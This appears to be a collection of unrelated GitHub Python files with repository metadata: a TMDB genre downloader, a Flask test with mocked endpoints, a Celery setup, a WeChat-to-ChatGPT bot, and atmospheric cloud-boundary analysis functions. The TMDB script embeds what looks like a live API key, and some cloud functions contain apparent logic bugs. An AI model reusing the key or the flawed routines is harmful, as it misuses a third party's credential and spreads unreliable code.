x = torch.rand(2, 1, opt.num_channel, opt.num_dim) # 1 x 1 x 120 x 64
print(net(x)) | hehichens/Cognitive | models/EEGNet.py | EEGNet.py | py | 3,378 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Module",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"li... |
69815063464 | import requests
import json
TMDB_API_KEY ='2ee130f2ba9bf221b6fe5107cffcac46'
def get_movie_genre():
request_url = f"https://api.themoviedb.org/3/genre/movie/list?api_key={TMDB_API_KEY}&language=en"
genres = requests.get(request_url).json()
for genre in genres['genres']:
fields = {
'name': genre['name'],
}
data = {
"model": "tmdb.genre",
"pk": genre['id'],
"fields": fields
}
genre_list.append(data)
genre_list = []
get_movie_genre()
file_path = "./genres.json"
with open(file_path, 'w', encoding='UTF-8') as outfile:
json.dump(genre_list, outfile, indent="\t", ensure_ascii=False) | uttamapaksa/MOVISION | db data/makegenre.py | makegenre.py | py | 710 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 40,
"usage_type": "call"
}
] |
73335280743 | # coding: utf-8
"""
Test webservices
"""
import sys
import os
PROJECT_HOME = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../../../'))
sys.path.append(PROJECT_HOME)
import json
import unittest
from flask import url_for
from flask_testing import TestCase
from httmock import urlmatch, HTTMock
from tugboat.app import create_app
@urlmatch(netloc=r'fakeapi\.query$')
def store_200(url, request):
return {
'status_code': 200,
'content': {'qid': 'adsf1234', 'query': 'q', 'numfound': 1}
}
@urlmatch(netloc=r'fakeapi\.query$')
def vault_500(url, request):
return {
'status_code': 500,
'content': 'ERROR'
}
class TestBumblebeeView(TestCase):
"""
A basic base class for all of the tests here
"""
def create_app(self):
"""
Create the wsgi application
"""
app_ = create_app()
app_.config['VAULT_QUERY_URL'] = 'http://fakeapi.query'
app_.config['BUMBLEBEE_URL'] = 'http://devui.adsabs.harvard.edu/'
self.bumblebee_url = app_.config['BUMBLEBEE_URL']
return app_
def test_get_redirect_with_qid(self):
"""
Tests that when you send a list of bibcodes, you get a queryid URL and
a redirect status code
"""
url = url_for('bumblebeeview')
bibcodes = ['bib1', 'bib2', 'bib3', 'bib4']
with HTTMock(store_200):
r = self.client.post(url, data=json.dumps(bibcodes))
self.assertStatus(r, 200)
self.assertEqual(
r.json['redirect'],
self.bumblebee_url + 'search/q=*%3A*&__qid=adsf1234'
)
def test_when_send_empty_or_no_bibcodes(self):
"""
Just a simple test to check someone actually sends something
"""
url = url_for('bumblebeeview')
r = self.client.post(url, data={'fake': 'data'})
self.assertStatus(r, 400)
def test_when_vault_query_sends_non_200(self):
"""
When vault/query returns a non-200 status code
"""
url = url_for('bumblebeeview')
bibcodes = ['bib1', 'bib2', 'bib3', 'bib4']
with HTTMock(vault_500):
r = self.client.post(url, data=json.dumps(bibcodes))
self.assertStatus(r, 500)
if __name__ == '__main__':
unittest.main(verbosity=2)
| adsabs/tugboat | tugboat/tests/tests_unit/test_webservices.py | test_webservices.py | py | 2,331 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9... |
22397199213 | import os
from datetime import datetime
from celery import Celery
from celery.schedules import crontab
from celery.utils.log import get_task_logger
# 1-s terminal celery -A MainWater beat
# 2-s terminal celery -A MainWater worker --loglevel=info
logger = get_task_logger(__name__)
# Set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MainWater.settings')
app = Celery('MainWater', broker="redis://localhost:7777")
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django apps.
app.conf.timezone = 'UTC'
#@app.on_after_configure.connect
#def setup_periodic_tasks(sender, **kwargs):
# Calls test('hello') every 10 seconds.
# sender.add_periodic_task(10.0, get_data_from_clever_counters.s('hello'), name='add every 10')
app.conf.beat_schedule = {
"every day between 6 AM & 18 PM": {
"task": "get_data", # <---- Name of task
"schedule": 60.0
},
}
app.autodiscover_tasks()
@app.task
def test(arg):
print(arg)
@app.task
def get_data_from_clever_counters(args, **kwargs):
today = datetime.today().day
today1 = datetime.today().month
print(today, today1)
| dillag/countersAPI | MainWater/MainWater/celery.py | celery.py | py | 1,497 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "celery.utils.log.get_task_logger",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.environ.setdefault",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name":... |
28639327912 | #-*- coding: GBK-*-
import time
from wxauto import *
import openai
import os
#代理端口
os.environ['HTTP_PROXY'] = 'http://127.0.0.1:7890'
os.environ['HTTPS_PROXY'] = 'http://127.0.0.1:7890'
#https://platform.openai.com/overview
openai.api_key="your_key"
def chatretern(prompt,moudel_engine="gpt-3.5-turbo"):
cmpletion=openai.ChatCompletion.create(
model=moudel_engine,
messages=[{"role":"user","content":prompt}]
)
return cmpletion
if __name__ == '__main__':
who = '文件传输助手' # 设置聊天对象,微信群名
nickname = 'chatgpt' # 触发chatgpt回复的关键字
speakList = ['帆'] #设置谁可以发言
wx = WeChat()
wx.ChatWith(who)
print("开始监控win微信程序")
while True:
msgobject1 = wx.GetLastMessage
speaker1, msgcontent, speakerid1 = msgobject1
time.sleep(1)
# 如果收到的消息包含 chatgpt 的昵称,并且发件人在聊天群中:
if nickname in msgcontent and speaker1 in speakList:
wx.SendMsg('已收到 %s 的问题:' % (speaker1) + msgcontent[7:])
print("已收到",'%s' % (speaker1),"的问题")
sccess = False
while not sccess:
try:
ai_response = chatretern(msgcontent[7:])
returnMessage="sumtoken:"+str(ai_response.usage.total_tokens)+" "+ai_response.choices[0].message['content']
sccess = True
except:
wx.SendMsg('error! retrying...')
time.sleep(1)
wx.SendMsg('@%s' % (speaker1) + returnMessage)
print("已回复",'%s' % (speaker1),"的问题")
continue
| sfs999/win_chatgpt | chatwx.py | chatwx.py | py | 1,735 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "openai.api_key",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "openai.ChatCompleti... |
34682614662 | import numpy as np
import matplotlib
import scipy
import netCDF4 as nc4
import numpy.ma as ma
import matplotlib.pyplot as plt
from netCDF4 import Dataset
import struct
import glob
import pandas as pd
from numpy import convolve
import datetime
import atmos
import matplotlib.dates as mdates
#"""
#Created on Wed Nov 13 10:41:35 2019
#functions to define,for each day of the dataset, which is the interval of time
#to consider to select typical boundary layer clouds and exclude other cloud types
#which can mess up the statistics. the filter is based on human selection based
#on visual inspection of cloudnet target classification and model cloud mask.
#As general rule: we exclude all clouds with cloud base above 2000 mt and vertical
#extension larger than 1000 m associated with a mixed / ice phase.
#'20130501']#'20130502']#, '20130501','20130424', '20130425', '20130427', '20130429'
#@author: cacquist
#"""
import xarray as xr
def f_selectingPBLcloudWindow(date):
""" function to select time intervals for processing cloud data in each day.
Also, we pick which algorithm to use with each type of data.
in particular:
- minmax correspond to select as cloud top the max of the cloud tops found.
Clouds above 5000 mt are filtered out (done with the function
f_calcCloudBaseTopPBLclouds)
- version2: selects boundary layer clouds with cloud base below 2500 mt and cloud tops below
CB+600mt.
"""
if date == '20130414':
timeStart = datetime.datetime(2013,4,14,6,0,0)
timeEnd = datetime.datetime(2013,4,14,23,59,59)
PBLheight = 2500.
if date == '20130420':
timeStart = datetime.datetime(2013,4,20,6,0,0)
timeEnd = datetime.datetime(2013,4,20,23,59,59)
PBLheight = 2000.
if date == '20130424':
timeStart = datetime.datetime(2013,4,24,6,0,0)
timeEnd = datetime.datetime(2013,4,24,23,59,59)
PBLheight = 2000.
if date == '20130425':
timeStart = datetime.datetime(2013,4,25,6,0,0)
timeEnd = datetime.datetime(2013,4,25,23,59,59)
PBLheight = 5000.
if date == '20130426':
timeStart = datetime.datetime(2013,4,26,6,0,0)
timeEnd = datetime.datetime(2013,4,26,23,59,59)
PBLheight = 5000.
if date == '20130427':
timeStart = datetime.datetime(2013,4,27,6,0,0)
timeEnd = datetime.datetime(2013,4,27,23,59,59)
PBLheight = 3000.
if date == '20130428':
timeStart = datetime.datetime(2013,4,28,6,0,0)
timeEnd = datetime.datetime(2013,4,28,23,59,59)
PBLheight = 3500.
if date == '20130429':
timeStart = datetime.datetime(2013,4,29,6,0,0)
timeEnd = datetime.datetime(2013,4,29,23,59,59)
PBLheight = 3000.
if date == '20130430':
timeStart = datetime.datetime(2013,4,30,6,0,0)
timeEnd = datetime.datetime(2013,4,30,23,59,59)
PBLheight = 3000.
if date == '20130501':
timeStart = datetime.datetime(2013,5,1,6,0,0)
timeEnd = datetime.datetime(2013,5,1,23,59,59)
PBLheight = 2500.
if date == '20130502':
timeStart = datetime.datetime(2013,5,2,6,0,0)
timeEnd = datetime.datetime(2013,5,2,23,59,59)
PBLheight = 4000.
if date == '20130503':
timeStart = datetime.datetime(2013,5,3,6,0,0)
timeEnd = datetime.datetime(2013,5,3,23,59,59)
PBLheight = 3000.
if date == '20130504':
timeStart = datetime.datetime(2013,5,4,6,0,0)
timeEnd = datetime.datetime(2013,5,4,23,59,59)
PBLheight = 2500.
if date == '20130505':
timeStart = datetime.datetime(2013,5,5,6,0,0)
timeEnd = datetime.datetime(2013,5,5,23,59,59)
PBLheight = 2500.
if date == '20130506':
timeStart = datetime.datetime(2013,5,6,6,0,0)
timeEnd = datetime.datetime(2013,5,6,23,59,59)
PBLheight = 3000.
if date == '20130509':
timeStart = datetime.datetime(2013,5,9,6,0,0)
timeEnd = datetime.datetime(2013,5,9,23,59,59)
PBLheight = 3000.
if date == '20130510':
timeStart = datetime.datetime(2013,5,10,6,0,0)
timeEnd = datetime.datetime(2013,5,10,23,59,59)
PBLheight = 3000.
if date == '20130518':
timeStart = datetime.datetime(2013,5,18,6,0,0)
timeEnd = datetime.datetime(2013,5,18,23,59,59)
PBLheight = 2500.
if date == '20130524':
timeStart = datetime.datetime(2013,5,24,6,0,0)
timeEnd = datetime.datetime(2013,5,24,23,59,59)
PBLheight = 4500.
if date == '20130525':
timeStart = datetime.datetime(2013,5,25,6,0,0)
timeEnd = datetime.datetime(2013,5,25,23,59,59)
PBLheight = 3000.
if date == '20130527':
timeStart = datetime.datetime(2013,5,27,6,0,0)
timeEnd = datetime.datetime(2013,5,27,23,59,59)
PBLheight = 3000.
if date == '20130528':
timeStart = datetime.datetime(2013,5,28,6,0,0)
timeEnd = datetime.datetime(2013,5,28,23,59,59)
PBLheight = 4000.
dictOut = {'timeStart':timeStart, 'timeEnd':timeEnd, 'heightPBL':PBLheight}
#,'20130504', '20130505','20130506','20130509','20130510'
# '20130414','20130420', '20130426','20130428', '20130430','20130524','20130525','20130527', '20130528'
return(dictOut)
#-------------------------------------------------------------------------------------
def f_calculateCloudBaseTopThickness(cloudMask, time, height, humanInfo):
"""
date : wednesday 13 may 2020
author: Claudia Acquistapace
goal: build a function to identify all cloud base and cloud top of clouds in the vertical profile at the same time.
Human observations for the day distinguish manually PBL from non-PBL clouds. An additional dataset of
PBL clouds is delivered based on this information.
Concept of the code:
step 1: given the cloud mask, find all cloud base and cloud tops.
step 2: build cloud database with all clouds saved as xarray dataset
step 3: identify cloud properties of PBL clouds using timeStart, timeEnd, MaxCTheight
input: cloudmask,
time,
height,
humanInfo (dictionary including timeStart, timeEnd, PBLheight from human obs on the day)
output: AllCloudDataset (xarray Dataset including cloud base, cloud top, cloud thickness, level number)
PBLcloudDataset (xarray Dataset for PBL clouds with cloud base, cloud top, cloud thickness, level number)
"""
dimTime = len(time)
dimHeight = len(height)
heightPBL = humanInfo['heightPBL']
timeStart = humanInfo['timeStart']
timeEnd = humanInfo['timeEnd']
# STEP 1: identifying all cloud bases and tops
# ---------------------------------------------------
# converting cloud mask to 1 / 0 matrices
BinaryMatrix = np.zeros((dimTime, dimHeight))
for itime in range(dimTime):
for iH in range(dimHeight):
if cloudMask[itime, iH] != 0.:
BinaryMatrix[itime, iH] = 1
# calculating gradient of binary cloud mask
gradBinary = np.diff(BinaryMatrix, axis=1)
# counting max number of cloud base/cloud top found
numberCB = []
numberCT = []
for itime in range(dimTime):
column = gradBinary[itime, :]
numberCB.append(len(np.where(column == -1.)[0][:]))
numberCT.append(len(np.where(column == 1.)[0][:]))
NCB = max(numberCB)
NCT = max(numberCT)
# generating cloud base and cloud top arrays
CBarray = np.zeros((dimTime, NCB))
CBarray.fill(np.nan)
CTarray = np.zeros((dimTime, NCT))
CTarray.fill(np.nan)
NlayersArray = np.zeros((dimTime))
NlayersArray.fill(np.nan)
# if no cloud bases or no cloud tops are found, then CB and CT are assigned to nan
if (NCB == 0) or (NCT == 0):
CBarray[iTime, :] = np.nan
CTarray[iTime, :] = np.nan
else:
# if some cloud base / cloud tops are found, all the found values are stored
# storing cloud base and cloud top arrays
for iTime in range(dimTime):
column = gradBinary[iTime, :]
indCB = np.where(column == -1.)[0][:]
NfoundCB = len(indCB)
indCT = np.where(column == 1.)[0][:]
NfoundCT = len(indCT)
CBarray[iTime, 0:NfoundCB] = height[indCB]
CTarray[iTime, 0:NfoundCT] = height[indCT]
NlayersArray[iTime] = numberCB[iTime]
# calculating cloud thickness based on the cloud base and tops found ( 2d array (time, Nlevels))
cloudThicknessDatabase = CTarray - CBarray
# generating array of levels
levels = np.arange(NCB)
# step 2: build cloud database with all clouds saved as xarray dataset
clouds = xr.Dataset(
data_vars = {'cloudBase' : (('time', 'levels'), CBarray),
'cloudTop' : (('time', 'levels'), CTarray),
'cloudThick': (('time', 'levels'), cloudThicknessDatabase)},
coords = {'levels': levels,
'time' : time})
# step 3: identify cloud properties of PBL clouds using timeStart, timeEnd, MaxCTheight
cloudsTimeWindow = clouds.sel(time=slice(timeStart, timeEnd))
PBLclouds = cloudsTimeWindow.where(cloudsTimeWindow.cloudTop < heightPBL)
return(clouds, PBLclouds)
#--------------------------------------------------------------------------
def f_calculateMinCloudBaseTop(clouds, PBLclouds, date_arr):
"""author: claudia Acquistapace
date: 18/05/2020
goal: function to calculate the minimum cloud base for the PBL and the corresponding cloud top
input: clouds - list of xarray datasets of cloud properties
PBLclouds - list of xarray datasets of PBL cloud properties
date_arr - array of days to be processed
output: minimum cloud base and corresponding cloud tops in matrices of dimtime, Nfiles dimensions
"""
# definition of output matrices
dimTime = 9600
Nfiles = len(date_arr)
CBarr_obs = np.zeros((dimTime, Nfiles))
CTarr_obs = np.zeros((dimTime, Nfiles))
TKarr_obs = np.zeros((dimTime, Nfiles))
CBarr_PBL_obs = np.zeros((dimTime, Nfiles))
CTarr_PBL_obs = np.zeros((dimTime, Nfiles))
TKarr_PBL_obs = np.zeros((dimTime, Nfiles))
# for each day, reading and saving minimum cloud base and corresponding cloud top
for indFile in range(Nfiles):
# readingt the date
date = date_arr[indFile]
yy = int(date[0:4])
mm = int(date[4:6])
dd = int(date[6:8])
timeStandard = pd.date_range(start=datetime.datetime(yy,mm,dd,0,0,0), \
end=datetime.datetime(yy,mm,dd,23,59,59), freq='9s')
# reading xarray datasets of the day
PBLcloud_dataset = PBLclouds[indFile]
cloud_dataset = clouds[indFile]
PBLCloudsStandard = PBLcloud_dataset.reindex({'time':timeStandard})
meanCB_obs = np.nanmin(cloud_dataset.cloudBase.values, axis=1)
meanCT_obs = np.nanmin(cloud_dataset.cloudTop.values, axis=1)
meanTK_obs = np.nanmin(cloud_dataset.cloudThick.values, axis=1)
meanCB_obs = np.nanmin(cloud_dataset.cloudBase.values, axis=1)
meanCT_obs = np.nanmin(cloud_dataset.cloudTop.values, axis=1)
meanTK_obs = np.nanmin(cloud_dataset.cloudThick.values, axis=1)
meanCB_PBL_obs = np.nanmin(PBLCloudsStandard.cloudBase.values, axis=1)
meanCT_PBL_obs = np.nanmin(PBLCloudsStandard.cloudTop.values, axis=1)
meanTK_PBL_obs = np.nanmin(PBLCloudsStandard.cloudThick.values, axis=1)
CBarr_obs[:, indFile] = meanCB_obs
CTarr_obs[:, indFile] = meanCT_obs
TKarr_obs[:, indFile] = meanTK_obs
CBarr_PBL_obs[:, indFile] = meanCB_PBL_obs
CTarr_PBL_obs[:, indFile] = meanCT_PBL_obs
TKarr_PBL_obs[:, indFile] = meanTK_PBL_obs
return (CBarr_obs, CTarr_obs, TKarr_obs, CBarr_PBL_obs)
#---------------------------------------------------------------------------------
def f_resampleArrays2StandardData(A, index, strDate):
"""
author : Claudia Acquistapace
date : 10/04/2020
goal : resample data with some misssing times (matrices of dimT < 9600) to the standard size (9600,150)
input : matrix of data to resize, datetime_array, height_array
output : ndarray of resampled matrix with nans wherever missing data are located
"""
import numpy as np
import pandas as pd
DF = pd.Series(A, index=index)
# I first construct my regular time index every 9s
# Obviously I put a little more periods (entire day would be 9600)
index = pd.date_range(strDate, periods=9600, freq='9s')
# There you go, by default missing values should be NaN
DFresampled = DF.loc[index]
return(DFresampled.values)
#---------------------------------------------------------------------------------
def f_resample2StandardData(A, index, cols, strDate):
"""
author : Claudia Acquistapace
date : 10/04/2020
goal : resample data with some missing times (matrices of dimT < 9600) to the standard size (9600,150)
input : matrix of data to resize, datetime_array, height_array
output : ndarray of resampled matrix with nans wherever missing data are located
"""
import numpy as np
import pandas as pd
DF = pd.DataFrame(A, index=index, columns=cols)
# I first construct my regular time index every 9s
# Obviously I put a little more periods (entire day would be 9600)
index = pd.date_range(strDate, periods=9600, freq='9s')
# There you go, by default missing values should be NaN
DFresampled = DF.loc[index]
return(DFresampled.values)
#aa
# closest function
#---------------------------------------------------------------------------------
# date : 16.10.2017
# author: Claudia Acquistapace
# goal: return the index of the element of the input array that in closest to the value provided to the function
def f_closest(array,value):
idx = (np.abs(array-value)).argmin()
return idx
def getNearestIndex(timeRef, timeStamp):
"""this function finds the nearest element of timeRef array to the value timeStamp within the given tolerance
and returns the index of the element found. If non is found within the given tolerance, it returns nan."""
try:
index = timeRef.index.get_loc(timeStamp, method='nearest')
except:
index = np.nan
return index
def getIndexList(dataTable, reference):
"""this function reads the less resolved time array (dataTable) and the time array to be used as reference (reference)
and the tolerance. then for every value in the reference array, it finds the index of the nearest element of
dataTable for a fixed tolerance. It provides as output the list of indeces of dataTable corresponding
to the closest elements of the reference array. """
#print(len(reference))
indexList = []
for value in reference:
#print(value)
index = getNearestIndex(dataTable, value)
indexList.append(index)
return indexList
def getIndexListsuka(dataTable, reference):
indexList = []
for value in reference:
#print(value)
index = dataTable.index.get_loc(value, method='nearest')
indexList.append(index)
return indexList
def getResampledDataPd(emptyDataFrame, LessResolvedDataFrame, indexList):
# it reads the dataframe to be filled with the resampled data (emptyDataFrame), then the originally less resolved
# data (dataDataFrame) and the list of indeces of the less resolved time array upsampled
# to the highly resolved resolutions. Then, with a loop on the indeces of the indexList,
# It assigns to the emptydataframe the values of the less resolved dataframe called by the
# corresponding index of the indexlist. The output is the filled emptydataFrame
for i, index in enumerate(indexList):
try:
emptyDataFrame.iloc[i]=LessResolvedDataFrame.iloc[index]
except:
pass
return emptyDataFrame
# function to calculate LWC from
#---------------------------------------------------------------------------------
# date : 23.10.2019
# author: Claudia Acquistapace
# goal: calculate LWC using standard Frisch approach
# input: linear reflectivity matrix, radar range gate resolution (assumed constant), \
#time array, height attar, LWP time serie
# output: LWC matrix (time, height)
def f_calculateLWCFrisch(Ze_lin, deltaZ, datetime_ICON, height_ICON, LWP_obs_res):
LWC_Frisch = np.zeros((len(datetime_ICON), len(height_ICON)))
LWC_Frisch.fill(np.nan)
LWP_obs_res = np.insert(LWP_obs_res,0,np.nan)
for indT in range(len(datetime_ICON)):
for indH in range(len(height_ICON)):
num = LWP_obs_res[indT] * np.sqrt(Ze_lin[indT,indH])
den = deltaZ*np.nansum(np.sqrt(Ze_lin[indT,:]))
#print(den)
#print(num)
LWC_Frisch[indT,indH] = num/den
return(LWC_Frisch)
# function to define cb and ct of the first cloud layer in a column appearing when reading from the top
#---------------------------------------------------------------------------------
# date : 31.01.2019
# author: Claudia Acquistapace
# goal: return the index of the element of the input array that in closest to the value provided to the function
def f_calcCloudBaseTop(cloudMask, dimTime, dimHeight, height):
# converting cloud mask to 1 / 0 matrices
BinaryMatrix = np.zeros((dimTime, dimHeight))
for itime in range(dimTime):
for iH in range(dimHeight):
if cloudMask[itime,iH] != 0.:
BinaryMatrix[itime,iH] = 1
# calculating gradient of binary cloud mask
gradBinary = np.diff(BinaryMatrix,axis=1)
# counting max number of cloud base/cloud top found
numberCB = []
numberCT = []
for itime in range(dimTime):
column = gradBinary[itime,:]
numberCB.append(len(np.where(column == 1.)[0][:]))
numberCT.append(len(np.where(column ==-1.)[0][:]))
NCB=max(numberCB)
NCT=max(numberCT)
# generating cloud base and cloud top arrays
CBarray = np.zeros((dimTime,NCB))
CBarray.fill(np.nan)
CTarray = np.zeros((dimTime,NCT))
CTarray.fill(np.nan)
# storing cloud base and cloud top arrays
for iTime in range(dimTime):
column = gradBinary[iTime,:]
indCB=np.where(column == -1.)[0][:]
NfoundCB=len(indCB)
indCT=np.where(column == 1.)[0][:]
NfoundCT=len(indCT)
CBarray[iTime,0:NfoundCB]=height[indCB]
CTarray[iTime,0:NfoundCT]=height[indCT]
return (CBarray,CTarray)
# function to define cb and ct of boundary layer clouds in a column appearing when reading from the top
#---------------------------------------------------------------------------------
# date : 22.10.2019
# author: Claudia Acquistapace
# input: cloudMask, dimension of time array, dimension of height array, height from model/obs (cloudnet)
# output: array of:
# - CBarray: time array having 4 dimensions to record four different cloud base heights per time stamp
# - CTarray: time array having 4 dimensions to record four different cloud top heights per time stamp
# - NlayersArray: number of distinct cloud layers identified per time stamp
# - CB_collective: minimum cloud base identified per time stamp
# - CT_collective: maximum cloud top identified per time stamp
# goal:
def f_calcCloudBaseTopPBLclouds(cloudMask, dimTime, dimHeight, height, cloudTimeArray, time):
# cloud mask for identifying cloud base and cloud top of PBL clouds
#CloudMaskCut = cloudMask
# filtering clouds above 5000mt
# ind_above = np.where(height > 5000.)
#CloudMaskCut[:, ind_above] = 0.
# converting cloud mask to 1 / 0 matrices
BinaryMatrix = np.zeros((dimTime, dimHeight))
for itime in range(dimTime):
for iH in range(dimHeight):
if cloudMask[itime,iH] != 0.:
BinaryMatrix[itime,iH] = 1
# calculating gradient of binary cloud mask
gradBinary = np.diff(BinaryMatrix,axis=1)
# counting max number of cloud base/cloud top found
numberCB = []
numberCT = []
for itime in range(dimTime):
column = gradBinary[itime,:]
numberCB.append(len(np.where(column == 1.)[0][:]))
numberCT.append(len(np.where(column ==-1.)[0][:]))
NCB=max(numberCB)
NCT=max(numberCT)
# generating cloud base and cloud top arrays
CBarray = np.zeros((dimTime,NCB))
CBarray.fill(np.nan)
CTarray = np.zeros((dimTime,NCT))
CTarray.fill(np.nan)
NlayersArray = np.zeros((dimTime))
NlayersArray.fill(np.nan)
# if no cloud bases or no cloud tops are found, then CB and CT are assigned to nan
if (NCB == 0) or (NCT == 0):
CB_collective = np.zeros((dimTime))
CB_collective.fill(np.nan)
CT_collective = np.zeros((dimTime))
CT_collective.fill(np.nan)
CB_PBL_out = np.zeros((dimTime))
CB_PBL_out.fill(np.nan)
CT_PBL_out = np.zeros((dimTime))
CT_PBL_out.fill(np.nan)
else:
# if some cloud base / cloud tops are found, all the found values are stored
# storing cloud base and cloud top arrays
for iTime in range(dimTime):
column = gradBinary[iTime,:]
indCB = np.where(column == -1.)[0][:]
NfoundCB = len(indCB)
indCT = np.where(column == 1.)[0][:]
NfoundCT = len(indCT)
CBarray[iTime,0:NfoundCB] = height[indCB]
CTarray[iTime,0:NfoundCT] = height[indCT]
NlayersArray[iTime] = numberCB[iTime]
# we define a collective cloud base/top to consider multilayer PBL clouds as one
# we assign min CB and max CT for each PBl cloud found.
CB_collective = np.asarray(CBarray[:,0])
CT_collective = np.asarray(CTarray[:,0])
for ind in range(dimTime):
# if (np.isnan(CB[ind,0]) == True):
CB_collective[ind] = np.nanmin(CBarray[ind,:])
CT_collective[ind] = np.nanmax(CTarray[ind,:])
# filtering clouds in PBL using human filtering for hours
#if np.count_nonzero(~np.isnan(CB_collective)) != 0:
timeStart = cloudTimeArray[0]
timeEnd = cloudTimeArray[1]
CB_PBL = pd.Series(np.repeat(np.nan, len(time)), index=time)
maskt = (CB_PBL.index > timeStart) * (CB_PBL.index < timeEnd)
CB_PBL.loc[maskt] = CB_collective[maskt]
CT_PBL = pd.Series(np.repeat(np.nan, len(time)), index=time)
maskt = (CT_PBL.index > timeStart) * (CT_PBL.index < timeEnd)
CT_PBL.loc[maskt] = CT_collective[maskt]
CT_PBL_out = CT_PBL.values
CB_PBL_out = CB_PBL.values
return (CBarray, CTarray, NlayersArray, CB_PBL_out, CT_PBL_out, CB_collective, CT_collective)
def f_calcCloudBaseTopPBLcloudsV2(cloudMask, dimTime, dimHeight, height, cloudTimeArray, \
time):
"""
@ author: cacquist
@ date : 10 November 2019
@ goal : this function corresponds to the version2 processing mode. It has been
generated to detect PBL clouds over JOYCE and it has been tuned with
statistical observed mean PBL cloud properties from the site.
INPUT:
- cloudMask : matrix of 0/1 containing cloud mask
- dimTime : dimension of time array
- dimHeight : dimension of height array
- cloudTimeArry :
- time : time array
OUTPUTS:
- CBarray : array containing all cloud bases found with the gradient method
- CTarray : array containing all cloud tops found with the gradient method
- NlayersArray : number fo cloud base/top found for each time
- CB_PBL_out : array of boundary layer cloud bases found
- CT_PBL_out : array of boundary layer cloud tops found
- CB_collective : array of minimum cloud base found
- CT_collective : array of maximum cloud top found
Methodology:
It sets the cloud base to be below 2500mt and the cloud geometrical thickness
to be 600 mt.
Check for cloud base height to be below 2500 mt:
If cloud base does not fullfill the condition, no PBL cloud
base and top are found and it returns nans.
If cloud base fullfills the condition, then it checks for cloud tops.
If maximum cloud top is found above the CB + 600 mt, lower cloud
tops are searched among the cloud tops below that height and the
minimum is taken.
If none are found cloud top nd cloud base are assigned to nan.
"""
meanCloudThickness = 600.
minCBheight = 2500.
# cloud mask for identifying cloud base and cloud top of PBL clouds
# filtering clouds above 5000mt
#cloudMaskCut = cloudMask
#ind_above = np.where(height > 5000.)
#cloudMaskCut[:, ind_above] = 0.
# converting cloud mask to 1 / 0 matrices
BinaryMatrix = np.zeros((dimTime, dimHeight))
for itime in range(dimTime):
for iH in range(dimHeight):
if cloudMask[itime,iH] != 0.:
BinaryMatrix[itime,iH] = 1
# calculating gradient of binary cloud mask
gradBinary = np.diff(BinaryMatrix,axis=1)
# counting max number of cloud base/cloud top found
numberCB = []
numberCT = []
for itime in range(dimTime):
column = gradBinary[itime,:]
numberCB.append(len(np.where(column == 1.)[0][:]))
numberCT.append(len(np.where(column ==-1.)[0][:]))
NCB=max(numberCB)
NCT=max(numberCT)
# generating cloud base and cloud top arrays
CBarray = np.zeros((dimTime,NCB))
CBarray.fill(np.nan)
CTarray = np.zeros((dimTime,NCT))
CTarray.fill(np.nan)
NlayersArray = np.zeros((dimTime))
NlayersArray.fill(np.nan)
# if no cloud bases or no cloud tops are found, then CB and CT are assigned to nan
if (NCB == 0) or (NCT == 0):
CB_collective = np.zeros((dimTime))
CB_collective.fill(np.nan)
CT_collective = np.zeros((dimTime))
CT_collective.fill(np.nan)
CB_PBL_out = np.zeros((dimTime))
CB_PBL_out.fill(np.nan)
CT_PBL_out = np.zeros((dimTime))
CT_PBL_out.fill(np.nan)
else:
# if some cloud base / cloud tops are found, all the found values are stored
# storing cloud base and cloud top arrays
for iTime in range(dimTime):
column = gradBinary[iTime,:]
indCB = np.where(column == -1.)[0][:]
NfoundCB = len(indCB)
indCT = np.where(column == 1.)[0][:]
NfoundCT = len(indCT)
CBarray[iTime,0:NfoundCB] = height[indCB]
CTarray[iTime,0:NfoundCT] = height[indCT]
NlayersArray[iTime] = numberCB[iTime]
# we define a collective cloud base/top to consider multilayer PBL clouds as one
# we assign min CB and max CT for each PBl cloud found.
CB_collective = np.asarray(CBarray[:,0])
CT_collective = np.asarray(CTarray[:,0])
CB_PBL_out = np.repeat(np.nan, len(time))
CT_PBL_out = np.repeat(np.nan, len(time))
for ind in range(dimTime):
# if (np.isnan(CB[ind,0]) == True):
CB_collective[ind] = np.nanmin(CBarray[ind,:])
CT_collective[ind] = np.nanmax(CTarray[ind,:])
#selecting temporal window in which cloud top and base for PBL clouds have to be calculated
if (time[ind] > cloudTimeArray[0]) * (time[ind] < cloudTimeArray[1]):
if (CB_collective[ind] < minCBheight):
# for boundary layer clouds, we can assume the lowest cloud base is correct
# we can also assume that from the lowest cloud base, the cloud does not extend
# in the vertical for more than 1500 mt. If the max cloud top is above 1500 mt then
# we select among cloud tops, those that are located withing such distance from cloud base
maxCTheightPBL = np.nanmin(CBarray[ind,:]) + meanCloudThickness
#print('max cloud top', maxCTheightPBL)
if (np.nanmax(CTarray[ind,:]) > maxCTheightPBL):
findLowerCT = np.where(CTarray[ind,:] < maxCTheightPBL)
if (len(findLowerCT[0]) == 0): # no elements are found below the maximum allowed height for cloud top
CT_PBL_out[ind] = np.nan
CB_PBL_out[ind] = np.nan
else:
#print('sono qui')
CT_PBL_out[ind] = np.nanmin(CTarray[ind,findLowerCT]) # assigning minmum cloud top
